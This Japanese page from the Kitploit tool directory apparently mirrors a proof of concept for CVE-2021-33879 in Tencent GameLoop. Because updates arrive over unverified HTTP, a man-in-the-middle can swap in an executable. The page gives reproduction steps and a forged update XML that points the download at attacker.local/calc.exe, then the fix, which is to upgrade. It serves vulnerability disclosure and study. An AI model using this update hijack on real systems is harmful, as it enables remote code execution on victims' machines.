Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-33879 — GameLoop アップデート MITM | Kitploit
ツール/GitHubGitHub/mmiszczyk/cve-2021-33879
脆弱性分析エクスプロイトウェブアプリケーション悪用マルウェア分析ペネトレーションテストサプライチェーンセキュリティ
GitHubmmiszczyk/cve-2021-33879

cve-2021-33879

GameLoop アップデート MITM

リポジトリを見る
145年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE ID: CVE-2021-33879

影響を受ける製品名とバージョン: GameLoop(4.1.21.90 より前のすべてのバージョン)

脆弱性タイプ: CWE-494: Download of Code Without Integrity Check


概要

GameLoop は Tencent によって開発された Android エミュレータです。この製品の更新メカニズムは暗号化も認証もされておらず(このエクスプロイトでは攻撃者が制御できる MD5 ハッシュを除く)、MITM の位置にいる攻撃者が、被害者のマシン上で実行される自身の更新パッケージを傍受・送信できるようになります。

説明

Tencent GameLoop は 4.1.21.90 より前のバージョンで、安全でない HTTP 接続を介して更新をダウンロードしていました。MITM の位置にいる悪意のある攻撃者は、更新パッケージを記述する XML 文書の内容を偽装し、ダウンロード URL を任意の Windows 実行ファイルを指す URL に置き換えることができました。唯一の整合性チェックが、ダウンロードしたファイルの MD5 チェックサムと XML 文書内の MD5 チェックサムとの比較だけだったため、ダウンロードされた実行ファイルが被害者のマシン上で実行されていました。

再現手順

  • 攻撃者環境を準備する:
    • Web サーバーを用意し、その上に実行可能なペイロードを配置し、その MD5 ハッシュを計算する
    • プロキシを用意し、ComponentUpdate.xml へのリクエストを傍受するように設定する
  • 被害者環境を準備する:
    • 攻撃者のプロキシを経由するようにインターネット接続を設定する
    • 脆弱なバージョンの GameLoop をインストールする
  • 被害者: 更新チェックを強制する
    • GameLoop を実行する
    • ハンバーガーメニューから「Update」をクリックする
  • 攻撃者: ComponentUpdate.xml を変更する(ペイロードの適切な url、md5、filesize を設定する)
root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateConfig>
	<GlobalConfig>
		<Item name="UpdateEnable" Value="1" />
	</GlobalConfig>
	<UpdatePolicy>
		<PolicyItem id="1" Enable="1" AutoUpdateRate="1" ManualUpdateRate="100" MatchUpdateOperation="2" Weight="4">
			<Condition Method="Or">
				<MatchSupplyId Type="market" MatchResult="0" Start="3.10.199.100" End="4.99.999.999" />
			</Condition>
		</PolicyItem>
	</UpdatePolicy>
	<UpdateOperation>
		<OperItem id="2" inherit="0" Desc="This is a malicious update" Title="Malicious update" text="I could serve you ransomware but I'll just spawn calc">
			<Item Type="market" url="http://attacker.local/calc.exe" md5="c4cb4fdf6369dd1342d2666171866ce5" version="5.10.199.100" filesize="32768" />
		</OperItem>
	</UpdateOperation>
</UpdateConfig>
ツールをダウンロード
  • 被害者: 「Update Now」をクリックする

Update prompt

  • 攻撃者のペイロードが被害者のマシン上で実行されるはずです

Payload executed

対策

GameLoop の新しいバージョンをインストールしてください。